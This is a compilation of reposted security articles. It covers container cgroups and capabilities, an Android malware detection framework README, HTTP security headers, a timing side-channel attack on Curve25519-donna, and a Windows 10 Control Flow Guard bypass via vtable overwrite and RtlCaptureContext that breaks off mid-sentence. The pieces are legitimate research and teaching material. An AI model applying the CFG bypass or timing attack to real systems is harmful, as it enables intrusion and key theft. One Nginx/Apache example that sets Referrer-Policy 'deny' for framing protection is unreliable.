mkdir /sys/fs/cgroup/memory/demo # ls /sys/fs/cgroup/memory/demo/ cgroup.clone_children memory.memsw.failcnt cgroup.event_control memory.memsw.limit_in_bytes cgroup.procs memory.memsw.max_usage_in_bytes memory.failcnt memory.memsw.usage_in_bytes memory.force_empty memory.move_charge_at_immigrate memory.kmem.failcnt memory.numa_stat memory.kmem.limit_in_bytes memory.oom_control memory.kmem.max_usage_in_bytes memory.pressure_level memory.kmem.slabinfo memory.soft_limit_in_bytes memory.kmem.tcp.failcnt memory.stat memory.kmem.tcp.limit_in_bytes memory.swappiness memory.kmem.tcp.max_usage_in_bytes memory.usage_in_bytes memory.kmem.tcp.usage_in_bytes memory.use_hierarchy memory.kmem.usage_in_bytes notify_on_release memory.limit_in_bytes tasks memory.max_usage_in_bytes To adjust a value we just have to write to the corresponding file. Let’s limit the cgroup to 100MB of memory and turn off swap. # echo "100000000" > /sys/fs/cgroup/memory/demo/memory.limit_in_bytes # echo "0" > /sys/fs/cgroup/memory/demo/memory.swappiness The tasks file is special, it contains the list of processes which are assigned to the cgroup. To join the cgroup we can write our own PID. # echo $$ > /sys/fs/cgroup/memory/demo/tasks Finally we need a memory hungry application. f = open("/dev/urandom", "r") data = "" i=0 while True: data += f.read(10000000) # 10mb i += 1 print "%dmb" % (i*10,) If you’ve setup the cgroup correctly, this program won’t crash your computer. # python hungry.py 10mb 20mb 30mb 40mb 50mb 60mb 70mb 80mb Killed If that didn’t crash your computer, congratulations! cgroups can’t be removed until every processes in the tasks file has exited or been reassigned to another group. Exit the shell and remove the directory with rmdir (don’t use rm -r). # exit exit $ sudo rmdir /sys/fs/cgroup/memory/demo Container security and capabilities Containers are extremely effective ways of running arbitrary code from the internet as root, and this is where the low overhead of containers hurts us. Containers are significantly easier to break out of than a VM. As a result many technologies used to improve the security of containers, such as SELinux, seccomp, and capabilities involve limiting the power of processes already running as root. In this section we’ll be exploring Linux capabilities. Consider the following Go program which attempts to listen on port 80. package main import ( "fmt" "net" "os" ) func main() { if _, err := net.Listen("tcp", ":80"); err != nil { fmt.Fprintln(os.Stdout, err) os.Exit(2) } fmt.Println("success") } What happens when we compile and run this? $ go build -o listen listen.go $ ./listen listen tcp :80: bind: permission denied Predictably this program fails; listing on port 80 requires permissions we don’t have. Of course we can just use sudo, but we’d like to give the binary just the one permission to listen on lower ports. Capabilities are a set of discrete powers that together make up everything root can do. This ranges from things like setting the system clock, to kill arbitrary processes. In this case, CAP_NET_BIND_SERVICE allows executables to listen on lower ports. We can grant the executable CAP_NET_BIND_SERVICE using the setcap command. $ sudo setcap cap_net_bind_service=+ep listen $ getcap listen listen = cap_net_bind_service+ep $ ./listen success For things already running as root, like most containerized apps, we’re more interested in taking capabilities away than granting them. First let’s see all powers our root shell has: $ sudo su # capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 Securebits: 00/0x0/1'b0 secure-noroot: no (unlocked) secure-no-suid-fixup: no (unlocked) secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) Yeah, that’s a lot of capabilities. As an example, we’ll use capsh to drop a few capabilities including CAP_CHOWN. If things work as expected, our shell shouldn’t be able to modify file ownership despite being root. $ sudo capsh --drop=cap_chown,cap_setpcap,cap_setfcap,cap_sys_admin --chroot=$PWD/rootfs -- root@localhost:/# whoami root root@localhost:/# chown nobody /bin/ls chown: changing ownership of '/bin/ls': Operation not permitted Conventional wisdom still states that VMs isolation is mandatory when running untrusted code. But security features like capabilities are important to protect against hacked applications running in containers. Beyond more elaborate tools like seccomp, SELinux, and capabilities, applications running in containers generally benefit from the same kind of best practices as applications running outside of one. Know what your linking against, don’t run as root in your container, update for known security issues in a timely fashion. Conclusion Containers aren’t magic. Anyone with a Linux machine can play around with them and tools like Docker and rkt are just wrappers around things built into every modern kernel. No, you probably shouldn’t go and implement your own container runtime. But having a better understanding of these lower level technologies will help you work with these higher level tools (especially when debugging). There’s a ton of topics I wasn’t able to cover today, networking and copy-on-write file systems probably being the biggest two. However, I hope this acts as a good starting point for anyone wanting to get their hands dirty. Happy hacking! Sursa: https://ericchiang.github.io/post/containers-from-scratch//
-
- 1
-
-
Table of Contents 1. Introduction 2. Installation 2.1. Dependencies 2.2. Building 3. Configuration 3.1. Unpacking the SDK 3.2. Path to Executables 3.3. Android Virtual Device 4. Usage 5. Emulab 6. Copyright Introduction maline is a free software Android malware detection framework. If you are an Org-mode user, you might want to read the executable version of this readme (the README.org file in the root). If you are interested in running extensive experiments with maline, take a look at the README file in the env/emulab directory, where you can find a lot of information on setting up a reproducible research environment. Installation *NOTE: We are in the process of debugging instructions for running maline in a virtual machine as there are some issues with that. Us, authors, got it successfully working on physical machines only.* maline has been developed under Ubuntu 12.04.3 LTS. It is very likely it will work under other POSIX systems too (GNU/Linux and Mac alike). The Android version we tested maline with is Android 4.4.3 (API version 19), which is assumed throughout the readme. To make it easier to start using maline, we created a Vagrant configuration file that sets up a virtual machine and install maline in it. If you want to run maline in such a way, you can simply run the following command in the root of this project: vagrant up and skip the rest of this section on dependencies and installing them. However, you will need to install an Android Virtual Device, as described below. Sursa: https://github.com/soarlab/maline
-
- 1
-
-
Everything you need to know about HTTP security headers 13 JANUARY 2017 on Security, Programming, Web Some physicists 28 years ago needed a way to easily share experimental data and thus the web was born. This was generally considered to be a good move. Unfortunately, everything physicists touch — from trigonometry to the strong nuclear force — eventually becomes weaponized and so too has the Hypertext Transfer Protocol. What can be attacked must be defended, and since tradition requires all security features to be a bolted-on afterthought, things… got a little complicated. This article explains what secure headers are and how to implement these headers in Rails, Django, Express.js, Go, Nginx, and Apache. Please note that some headers may be best configured in on your HTTP servers, while others should be set on the application layer. Use your own discretion here. You can test how well you’re doing with Mozilla’s Observatory. Did we get anything wrong? Contact us at hello@appcanary.com. HTTP Security Headers X-XSS-Protection Why? Should I use it? How? I want to know more Content Security Policy Why? Should I use it? How? I want to know more HTTP Strict Transport Security (HSTS) Why? Should I use it? How? I want to know more HTTP Public Key Pinning (HPKP) Why? Should I use it? How? I want to know more X-Frame-Options Why? Should I use it? How? I want to know more X-Content-Type-Options Why? Should I use it? How? Referrer-Policy Why? Should I use it? How? I want to know more Cookie Options Why? Should I use it? How? X-XSS-Protection X-XSS-Protection: 0; X-XSS-Protection: 1; X-XSS-Protection: 1; mode=block Why? Cross Site Scripting, commonly abbreviated XSS, is an attack where the attacker causes a page to load some malicious javascript. X-XSS-Protection is a feature in Chrome and Internet Explorer that is designed to protect against “reflected” XSS attacks — where an attacker is sending the malicious payload as part of the request1. X-XSS-Protection: 0 turns it off. X-XSS-Protection: 1 will filter out scripts that came from the request - but will still render the page X-XSS-Protection: 1; mode=block when triggered, will block the whole page from being rendered. Should I use it? Yes. Set X-XSS-Protection: 1; mode=block. The “filter bad scripts” mechanism is problematic; see here for why. How? Platform What do I do? Rails 4 and 5 On by default Django SECURE_BROWSER_XSS_FILTER = True Express.js Use helmet Go Use unrolled/secure Nginx add_header X-XSS-Protection "1; mode=block"; Apache Header always set X-XSS-Protection "1; mode=block" I want to know more X-XSS-Protection - MDN Content Security Policy Content-Security-Policy: <policy> Why? Content Security Policy can be thought of as much more advanced version of the X-XSS-Protection header above. While X-XSS-Protection will block scripts that come from the request, it’s not going to stop an XSS attack that involves storing a malicious script on your server or loading an external resource with a malicious script in it. CSP gives you a language to define where the browser can load resources from. You can white list origins for scripts, images, fonts, stylesheets, etc in a very granular manner. You can also compare any loaded content against a hash or signature. Should I use it? Yes. It won’t prevent all XSS attacks, but it’s a significant mitigation against their impact, and an important aspect of defense-in-depth. That said, it can be hard to implement. If you’re an intrepid reader and went ahead and checked the headers appcanary.com returns2, you’ll see that we don’t have CSP implemented yet. There are some rails development plugins we’re using that are holding us back from a CSP implementation that will have an actually security impact. We’re working on it, and will write about it in the next instalment! How? Writing a CSP policy can be challenging. See here for a list of all the directives you can employ. A good place to start is here. Platform What do I do? Rails 4 and 5 Use secureheaders Django Use django-csp Express.js Use helmet/csp Go Use unrolled/secure Nginx add_header Content-Security-Policy "<policy>"; Apache Header always set Content-Security-Policy "<policy>" I want to know more Content-Security-Policy - MDN CSP Quick Reference Guide Google’s CSP Guide HTTP Strict Transport Security (HSTS) Strict-Transport-Security: max-age=<expire-time> Strict-Transport-Security: max-age=<expire-time>; includeSubDomains Strict-Transport-Security: max-age=<expire-time>; preload Why? When we want to securely communicate with someone, we face two problems. The first problem is privacy; we want to make sure the messages we send can only be read by the recipient, and no one else. The other problem is that of authentication: how do we know the recipient is who they say they are? HTTPS solves the first problem with encryption, though it has some major issues with authentication (more on this later, see Public Key Pinning). The HSTS header solves the meta-problem: how do you know if the person you’re talking to actually supports encryption? HSTS mitigates an attack called sslstrip. Suppose you’re using a hostile network, where a malicious attacker controls the wifi router. The attacker can disable encryption between you and the websites you’re browsing. Even if the site you’re accessing is only available over HTTPS, the attacker can man-in-the-middle the HTTP traffic and make it look like the site works over unencrypted HTTP. No need for SSL certs, just disable the encryption. Enter the HSTS. The Strict-Transport-Security header solves this by letting your browser know that it must always use encryption with your site. As long as your browser has seen an HSTS header — and it hasn’t expired — it will not access the site unencrypted, and will error out if it’s not available over HTTPS. Should I use it? Yes. Your app is only available over HTTPS, right? Trying to browse over regular old HTTP will redirect to the secure site, right? (Hint: Use letsencrypt if you want to avoid the racket that are commercial certificate authorities.) The one downside of the HSTS header is that it allows for a clever technique to create supercookies that can fingerprint your users. As a website operator, you probably already track your users somewhat - but try to only use HSTS for good and not for supercookies. How? The two options are includeSubDomains - HSTS applies to subdomains preload - Google maintains a service that hardcodes3 your site as being HTTPS only into browsers. This way, a user doesn’t even have to visit your site: their browser already knows it should reject unencrypted connections. Getting off that list is hard, by the way, so only turn it on if you know you can support HTTPS forever on all your subdomains. Platform What do I do? Rails 4 config.force_ssl = true Does not include subdomains by default. To set it: config.ssl_options = { hsts: { subdomains: true } } Rails 5 config.force_ssl = true Django SECURE_HSTS_SECONDS = 31536000 SECURE_HSTS_INCLUDE_SUBDOMAINS = True Express.js Use helmet Go Use unrolled/secure Nginx add_header Strict-Transport-Security "max-age=31536000; includeSubdomains; "; Apache Header always set Strict-Transport-Security "max-age=31536000; includeSubdomains; I want to know more RFC 6797 Strict-Transport-Security - MDN HTTP Public Key Pinning (HPKP) Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; includeSubDomains Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; report-uri=<reportURI> Why? The HSTS header described above was designed to ensure that all connections to your website are encrypted. However, nowhere does it specify what key to use! Trust on the web is based on the certificate authority (CA) model. Your browser and operating system ship with the public keys of some trusted certificate authorities which are usually specialized companies and/or nation states. When a CA issues you a certificate for a given domain that means anyone who trusts that CA will automatically trust the SSL traffic you encrypt using that certificate. The CAs are responsible for verifying that you actually own a domain (this can be anything from sending an email, to asking you to host a file, to investigating your company). Two CAs can issue a certificate for the same domain to two different people, and browsers will trust both. This creates a problem, especially since CAs can be and arecompromised. This allows attackers to MiTM any domain they want, even if that domain uses SSL & HSTS! The HPKP header tries to mitigate this. This header lets you to “pin” a certificate. When a browser sees the header for the first time, it will save the certificate. For every request up to max-age, the browser will fail unless at least one certificate in the chain sent from the server has a fingerprint that was pinned. This means that you can pin to the CA or a intermediate certificate along with the leaf in order to not shoot yourself in the foot (more on this later). Much like HSTS above, the HPKP header also has some privacy implications. These were laid out in the RFC itself. Should I use it? Probably not. HPKP is a very very sharp knife. Consider this: if you pin to the wrong certificate, or you lose your keys, or something else goes wrong, you’ve locked your users out of your site. All you can do is wait for the pin to expire. This article lays out the case against it, and includes a fun way for attackers to use HPKP to hold their victims ransom. One alternative is using the Public-Key-Pins-Report-Only header, which will just report that something went wrong, but not lock anyone out. This allows you to at least know your users are being MiTMed with fake certificates. How? The two options are includeSubDomains - HPKP applies to subdomains report-uri - Inavlid attempts will be reported here You have to generate a base64 encoded fingerprint for the key you pin to, and you have to use a backup key. Check this guide for how to do it. Platform What do I do? Rails 4 and 5 Use secureheaders Django Write custom middleware Express.js Use helmet Go Use unrolled/secure Nginx add_header Public-Key-Pins 'pin-sha256="<primary>"; pin-sha256="<backup>"; max-age=5184000; includeSubDomains'; Apache Header always set Public-Key-Pins 'pin-sha256="<primary>"; pin-sha256="<backup>"; max-age=5184000; includeSubDomains'; I want to know more RFC 7469 HTTP Public Key Pinning (HPKP) - MDN X-Frame-Options X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW-FROM https://example.com/ Why? Before we started giving dumb names to vulnerabilities, we used to give dumb names to hacking techniques. “Clickjacking” is one of those dumb names. The idea goes like this: you create an invisible iframe, place it in focus and route user input into it. As an attacker, you can then trick people into playing a browser-based game while their clicks are being registered by a hidden iframe displaying twitter - forcing them to non-consensually retweet all of your tweets. It sounds dumb, but it’s an effective attack. Should I use it? Yes. Your app is a beautiful snowflake. Do you really want some genius shoving it into an iframe so they can vandalize it? How? X-Frame-Options has three modes, which are pretty self explanatory. DENY - No one can put this page in an iframe SAMEORIGIN - The page can only be displayed in an iframe by someone on the same origin. ALLOW-FROM - Specify a specific url that can put the page in an iframe One thing to remember is that you can stack iframes as deep as you want, and in that case, the behavior of SAMEORIGIN and ALLOW-FROM isn’t specified. That is, if we have a triple-decker iframe sandwich and the innermost iframe has SAMEORIGIN, do we care about the origin of the iframe around it, or the topmost one on the page? ¯\_(ツ)_/¯. Platform What do I do? Rails 4 and 5 SAMEORIGIN is set by default. To set DENY: config.action_dispatch.default_headers['X-Frame-Options'] = "DENY" Django MIDDLEWARE = [ ... 'django.middleware.clickjacking.XFrameOptionsMiddleware', ... ] This defaults to SAMORIGIN. To set DENY: X_FRAME_OPTIONS = 'DENY' Express.js Use helmet Go Use unrolled/secure Nginx add_header Referrer-Policy "deny"; Apache Header always set Referrer-Policy "deny" I want to know more RFC 7034 X-Frame-Options - MDN. X-Content-Type-Options X-Content-Type-Options: nosniff; Why? The problem this header solves is called “MIME sniffing”, which is actually a browser “feature”. In theory, every time your server responds to a request it is supposed to set a Content-Type header in order to tell the browser if it’s getting some HTML, a cat gif, or a Flash cartoon from 2008. Unfortunately, the web has always been broken and has never really followed a spec for anything; back in the day lots of people didn’t bother to set the content type header properly. As a result, browser vendors decided they should be really helpful and try to infer the content type by inspecting the content itself while completely ignore the content type header. If it looks like a gif, display a gif!, even though the content type is text/html. Likewise, if it looks like we got some HTML, we should render it as such even if the server said it’s a gif. This is great, except when you’re running a photo-sharing site, and users can upload photos that look like HTML with javascript included, and suddenly you have a stored XSS attack on your hand. The X-Content-Type-Options headers exist to tell the browser to shut up and set the damn content type to what I tell you, thank you. Should I use it? Yes, just make sure to set your content types correctly. How? Platform What do I do? Rails 4 and 5 On by default Django SECURE_CONTENT_TYPE_NOSNIFF = True Express.js Use helmet Go Use unrolled/secure Nginx add_header X-Content-Type-Options nosniff; Apache Header always set X-Content-Type-Options nosniff Referrer-Policy Referrer-Policy: "no-referrer" Referrer-Policy: "no-referrer-when-downgrade" Referrer-Policy: "origin" Referrer-Policy: "origin-when-cross-origin" Referrer-Policy: "same-origin" Referrer-Policy: "strict-origin" Referrer-Policy: "strict-origin-when-cross-origin" Referrer-Policy: "unsafe-url" Why? Ah, the Referer header. Great for analytics, bad for your users’ privacy. At some point the web got woke and decided that maybe it wasn’t a good idea to send it all the time. And while we’re at it, let’s spell “Referrer” correctly4. The Referrer-Policy header allows you to specify when the browser will set a Refererheader. Should I use it? It’s up to you, but it’s probably a good idea. If you don’t care about your users’ privacy, think of it as a way to keep your sweet sweet analytics to yourself and out of your competitors’ grubby hands. Set Referrer-Policy: "no-referrer" How? Platform What do I do? Rails 4 and 5 Use secureheaders Django Write custom middleware Express.js Use helmet Go Write custom middleware Nginx add_header Referrer-Policy "no-referrer"; Apache Header always set Referrer-Policy "no-referrer" I want to know more X-XSS-Protection - MDN Cookie Options Set-Cookie: <key>=<value>; Expires=<expiryDate>; Secure; HttpOnly; SameSite=strict Why? This isn’t a security header per se, but there are three different options for cookies that you should be aware of. Cookies marked as Secure will only be served over HTTPS. This prevents someone from reading the cookies in a MiTM attack where they can force the browser to visit a given page. HttpOnly is a misnomer, and has nothing to do with HTTPS (unlike Secure above). Cookies marked as HttpOnly can not be accessed from within javascript. So if there is an XSS flaw, the attacker can’t immediately steal the cookies. SameSite helps defend against Cross-Origin Resource Sharing (CSRF) attacks. This is an attack where a different website the user may be visiting inadvertently tricks them into making a request against your site, i.e. by including an image to make a GET request, or using javascript to submit a form for a POST request. Generally, people defend against this using CSRF tokens. A cookie marked as SameSite won’t be sent to a different site. It has two modes, lax and strict. Lax mode allows the cookie to be sent in a top-level context for GET requests (i.e. if you clicked a link). Strict doesn’t send any third-party cookies. Should I use it? You should absolutely set Secure and HttpOnly. Unfortunately, as of writing, SameSite cookies are available only in Chrome and Opera, so you may want to ignore them for now. How? Platform What do I do? Rails 4 and 5 Secure and HttpOnly enabled by default. For SameSite, use secureheaders Django Session cookies are HttpOnly by default. To set secure: SESSION_COOKIE_SECURE = True. Not sure about SameSite. Express.js cookie: { secure: true, httpOnly: true, sameSite: true } Go http.Cookie{Name: "foo", Value: "bar", HttpOnly: true, Secure: true} For SameSite, see this issue. Nginx You probably won’t set session cookies in Nginx Apache You probably won’t set session cookies in Apache Thanks to @wolever for python advice Sursa: https://blog.appcanary.com/2017/http-security-headers.html
-
- 1
-
-
When Constant-Time Source Code May Not Save You Thierry Kaufmann January 16, 2017 Conferences and events Crypto Post navigation On November 14 at CANS 2016 in Milan I presented a timing attack against an implementation of Curve25519 (also called X25519). This elliptic curve was designed by DJ Bernstein in order to provide a secure curve without probable NSA back doors and with safe computations. Additionally it was designed to be protected against state-of-the-art timing attacks. The targeted implementation called Curve25519-donna essentially follows the prescriptions of the informational RFC 7748 Elliptic Curves for Security. The purpose of this recommendation is to avoid the use of weak ECC designs containing timing-dependent instructions. While it is a good idea to set some minimum security requirements, those are generally not sufficient. I will show this with a timing attack against Curve25519-donna. The implementation is publicly available on Github and follows Bernstein’s first design. It is used for the computation of a shared secret with ECDH. This blog post will not provide all the details of the attack. If you are interested in knowing more, have a look at the paper When Constant-Time Source Yields Variable-Time Binary: Exploiting Curve25519-donna Built with MSVC 2015. Presentation of the implementation of the curve The equation of the elliptic curve is given by over the field with . The computations are only executed on the X-coordinate. The value of a coordinate can be seen as a large integer and this integer can be written as a polynomial in order to improve the computations: with . The value of the integer is given by . This allows storage 10 coefficients with a bounded value. There is no point validation: any 32-byte integer can be given as a point and the multiplication will be executed safely. There are however two restrictions on the private key: the leading 1 must be at bit position 2 and the last three bits must be zero. For scalar multiplication Curve25519-donna uses a specific implementation of the Montgomery ladder allowing the execution of the exact same instructions whether the key bit value is 0 or 1. Setup The idea of the timing attack is to measure the time needed for a user to compute the shared secret with the point we sent them. If the timing needed depends on the input, the next step consists of finding a link between the timing leakage and some secret data, for example a secret key. In our case we want to recover the secret key used to compute the shared secret in the ECDH protocol. For this we only have access to the time required to do the computation of the multiplication of a point and the secret key, as shown in Figure 1. Figure 1. ECDH protocol. In order to measure the timings, the Intel assembly instruction rdtsc (read time stamp counter) was used. To make the measurements more stable, it was called the following way: getTicksBeginning(); getTicksEnd(); getTicksBeginning(); getTicksEnd(); start = getTicksBeginning(); // Code to be measured end = getTicksEnd With: unsigned long getTicksBeginning() { unsigned long time; __asm { cpuid // Force in order execution rdtsc // eax = counter time mov time, eax // time = eax }; return time; } unsigned long getTicksEnd() { unsigned long time; __asm { rdtscp // eax = counter time mov time, eax // time = eax cpuid // Force in order execution }; return time; } The computation was executed and timed locally on a Sandy Bridge 64-bit Windows 7 PC with Intel i5-2400 processor: 3.1 GHz, 4 cores, 4 threads. It should be noted that the code of the curve was compiled for 32-bit architectures using MSVC 2015. Timing Leakage A dependence of the computation time on the input value can be revealed by comparing the timings obtained by computing multiple times the scalar multiplication with the same key and the time taken to compute multiplications with different keys . The results are shown in Figure 2. Figure 2. Computation times depending on the key. The computation times of the multiplication with the same key are shown in grey and the timings of the multiplications with different keys are shown in orange. We can see that the timing distribution of the orange crosses varies much more than that of the grey pluses. The second part of the attack consists of finding the origin of the leakage and seeing whether it is exploitable. Looking carefully at the assembly code we discover that the timing leakage is coming from a run-time library of Windows: llmul (see code below). These assembly instructions perform the multiplication of two 64-bit integers. Here the timing difference is introduced when the 32 most significant bits (MSB) of both operands of the multiplication are all zero. In this case the multiplication of the 32 MSB is omitted, as shown in orange in the following code: title llmul - long multiply routine ;*** ;llmul.asm - long multiply routine ; ; Copyright (c) Microsoft Corporation. All rights reserved. ; ;Purpose: ; Defines long multiply routine ; Both signed and unsigned routines are the same, since multiply's ; work out the same in 2's complement ; creates the following routine: ; __allmul ;************************************************************************ .xlist include vcruntime.inc include mm.inc .list CODESEG _allmul PROC NEAR .FPO (0, 4, 0, 0, 0, 0) A EQU [esp + 4] ; stack address of a B EQU [esp + 12] ; stack address of b mov eax,HIWORD(A) mov ecx,HIWORD(B) or ecx,eax ;test for both hiwords zero. mov ecx,LOWORD(B) jnz short hard ;both are zero, just mult ALO and BLO mov eax,LOWORD(A) mul ecx ret 16 ; callee restores the stack hard: push ebx .FPO (1, 4, 0, 0, 0, 0) A2 EQU [esp + 8] ; stack address of a B2 EQU [esp + 16] ; stack address of b mul ecx ;eax has AHI, ecx has BLO, so AHI * BLO mov ebx,eax ;save result mov eax,LOWORD(A2) mul dword ptr HIWORD(B2) ;ALO * BHI add ebx,eax ;ebx = ((ALO * BHI) + (AHI * BLO)) mov eax,LOWORD(A2) ;ecx = BLO mul ecx ;so edx:eax = ALO*BLO add edx,ebx ;now edx has all the LO*HI stuff pop ebx ret 16 ; callee restores the stack _allmul ENDP end This function is called from the function fscalar_product which simply computes the multiplication of the coefficients with a constant integer. The type limb is a 64-bit integer. static void fscalar_product(limb *output, const limb *in, const limb scalar) { unsigned i; for (i = 0; i < 10; ++i) { output[i] = in[i] * scalar; } } In the elliptic curve implementation the 32 MSB of the coefficients are only not zero when they are negative (two’s complement is used to represent the negative numbers). Thus we can say that it takes more time to process a negative coefficient than a positive coefficient. To corroborate this finding, let’s compare the timing measurements for negative and positive coefficients: Figure 3. Comparison of timings for positive and negative coefficients. It can be seen that on average the multiplications with negative coefficients take more time than those with positive coefficients. The next step is to mount an attack taking advantage of this leakage. We need to find a link between the key bit processing time (where the leakage appears) and the overall computation time that we can measure. To do so the idea is to see the overall computation time as the time to compute the processing of a key bit , plus the time to compute the processing of the key bits and the key bits , for a given base point P: We can make the assumption that the time to process the other bits (than the targeted key bit ) is random (Gaussian). Then in average over executions, we have: And it follows that for two sets of base points A and B, : If , then With base points selected at random in the sets A and B, the average of the times required to process the key bit only tells us that in average the time to compute the processing of the key bit took more time with the base points in A than those in B. We have to select the base points in a way that allows the differentiation of the value of . Let’s define two sets: : set of base points causing more negative coefficients in the polynomial representing the coordinate of the point being added in the Montgomery ladder when : set of base points causing more negative coefficients in the polynomial representing the coordinate of the point being added in the Montgomery ladder when Then we have: and otherwise. We have found a link between the leakage and the key bits values. The timing attack can be performed. Timing Attack As the timing measurements can vary significantly for the same execution depending on the processes handled by the processor, the measures have to be repeated many times. The idea is to perform the attack bit per bit and construct a key sequentially with the bits found. For each bit of the key, the algorithm is the following: Find 200 base points in and 200 in . To do so, we simply select base points (integers) at random and count the number of negative coefficients in the polynomial representing the coordinate of the point being added for the key bit we are interested in. For that we use the key constructed with the previous bits found and the computation is done locally. Measure the timings for every base point. To do so, each measurement is repeated 25,000 times (found empirically) and we take the 15 minimum values among them. Then we take the average value of these 15 timings. Finally, we take the mean of the timings of the base points in and the mean of the base points in and we compare those two values. These steps are repeated for the same key bit until we get twice the same value. So in the worst case the algorithm is repeated three times per bit of the key. Results The attack was successfully performed locally. An example of timings is shown in Figure 3. Figure 3. Comparison of the means of and for It should be noted that the attack takes about 1 month to recover the entire key in our setup. 25,000 measurements take about 15 seconds, there are 400 base points and the measurements can be repeated up to three times. 251 key bits have to be recovered. Once a bit is wrongly recovered the following bits cannot be trusted as we select the base points for another key. In order to test the feasibility on the Internet, some communications delays were added to the measurements. The attack was still successful. Several optimizations could be implemented. For example feedback on the key bits found, brute force once there are only few key bits to recover, parameters optimizations, etc. However the purpose of this work was not to exploit the weakness in this specific implementation. Conclusion Simply following the recommendations of the RFC and having a “constant-time” source code is not sufficient to prevent timing leakage. Once a security design is implemented, whatever effort is put into protecting each part of the code, there still remains a strong possibility of a timing leak. It is virtually impossible to have control over all the parameters at stake. Compiler and processor optimizations, processor specificity, hardware construction, and run-time libraries are all examples of elements that cannot be predicted when implementing at a high level. The attack developed shows that the effects of these low-level actors can be exploited practically for the curve X25519: it is not only theoretically possible to find weaknesses, they can be found and exploited in a reasonable amount of time. Nevertheless, the idea of ensuring that the design itself is secure by using a formalized approach such as RFC is an important step in minimizing the side-channel leakage of any final system. This attack also highlighted a potential weakness induced by the Windows run-time library: every code compiled in 32-bit with MSVC on 64-architectures will call llmul every time a 64-bit multiplication is executed. Sursa: https://research.kudelskisecurity.com/2017/01/16/when-constant-time-source-may-not-save-you/
-
January 16, 2017 Bypassing Control Flow Guard in Windows 10 Morten Schenk This blog post is the result of some research I did back in July of 2016, but did not have the possibility to publish before now. In June of 2016 Theori published a blog post on an Internet Explorer vulnerability which was patched in MS16-063, the exploit they wrote was for Internet Explorer 11 on Windows 7, and as their own blog post indicates the exploit will not work on Windows 10 due to the mitigation technology called Control Flow Guard. This blog post describes how I ported the exploit to Windows 10 and bypassed CFG, in fact I found another method, which will be posted in an upcoming blog post. Understanding the Enemy – Control Flow Guard Control Flow Guard (CFG) is a mitigation implemented by Microsoft in Windows 8.1 Update 3 and Windows 10 which attempts to protect indirect calls at the assembly level. Trend Micro has published a good analysis of how CFG is implemented on Windows 10. There have already been several bypasses published for CFG, but most of these previous ones have targeted the CFG implementation algorithms themselves, while I wanted to look at weaknesses in the functionality. As Theori wrote in their blog post the exploit technique from Windows 7 will not work due to the presence of CFG, let us look closer at why and try to understand a way around it. The exploit code from the Theori github works on Internet Explorer on Windows 10 up until the overwritten virtual function table is called. So, we are left with the question of how to leverage the arbitrary read/write primitive to bypass CFG. According to the research by Trend Micro, CFG is invoked by the function LdrpValidateUserCallTarget which validates if a function is valid to use in an indirect call, it looks like this: The pointer loaded into EDX is the base pointer of the validation bitmap, which in this case is: Then the function which is validated has its address loaded into ECX, if kernel32!VirtualProtectStub is taken as example then the address in this case is: The address is then right shifted 8 bits and used to load the DWORD which holds the validation bit for that address, in this case: The function address is then bit shifted 3 to the right and a bit test is performed, this essentially does a modulo 0x20 on the bit shifted address which is then the bit to be checked in the DWORD from the validation bitmap, so in this case: So the relevant bit is at offset 0x14 in: Which means that it is valid, so VirtualProtect is a valid calling address, however this does not really solve the problem, the arguments for it must be supplied by the attacker as well. Normally this is done in a ROP chain but any bytes not stemming from the beginning of a function are not valid. So, the solution is to find a function which may be called where the arguments can be controlled and the functionality of the function gives the attacker an advantage. This requires us to look closer at the exploit. Exploit on Windows 10 In the exploit supplied by Theori, code execution is achieved by overwriting the virtual function table of the TypedArray with a stack pivot gadget, since this is no longer possible it is worth looking into the functions available to a TypedArray, while doing this the following two functions seem interesting: They are at offsets 0x7C and 0x188, they are interesting since they can be called directly from Javascript code and HasItem has one user controlled parameter while Subarray has two user controlled parameters. The issue however is that neither of them return any data other than Booleans. The question is then which function should be used to overwrite them with, furthermore the chosen function must take the same number of arguments, otherwise the stack will be misaligned on return which will raise an exception. The API’s I searched for should be used to leak a pointer to the stack which could then be used to overwrite a return address, thus bypassing CFG. The API I located which could be used is RtlCaptureContext which is present in kernel32.dll, kernelbase.dll and ntdll.dll, the API takes one argument which is a pointer to a CONTEXT structure as shown on MSDN: A CONTEXT structure holds a dump of all the registers including ESP, furthermore the input value is just a pointer to a buffer which can hold the data. Looking at the layout of a TypedArray object the following appears: The first DWORD is the vtable pointer, which can be overwritten to create a fake vtable holding the address of the RtlCaptureContext API at offset 0x7C, while the DWORD at offset 0x20 is the pointer to the actual data of the TypedArray where the size is user controlled: Since it is also possible to leak the address of this buffer, it can serve as the parameter for RtlCaptureContext. To accomplish this a fake vtable now has to be created with a pointer to ntdll!RtlCaptureContext at offset 0x7C, that means leaking the address of RtlCaptureContext, which in turn means leaking the address of ntdll.dll. The default route of performing this would be to use the address of the vtable which is a pointer into jscript9.dll: From this pointer iterate back 0x1000 bytes continuously looking for the MZ header, and then going through the import table looking for a pointer into kernelbase.dll. Then doing the same for that pointer to gain the base address of 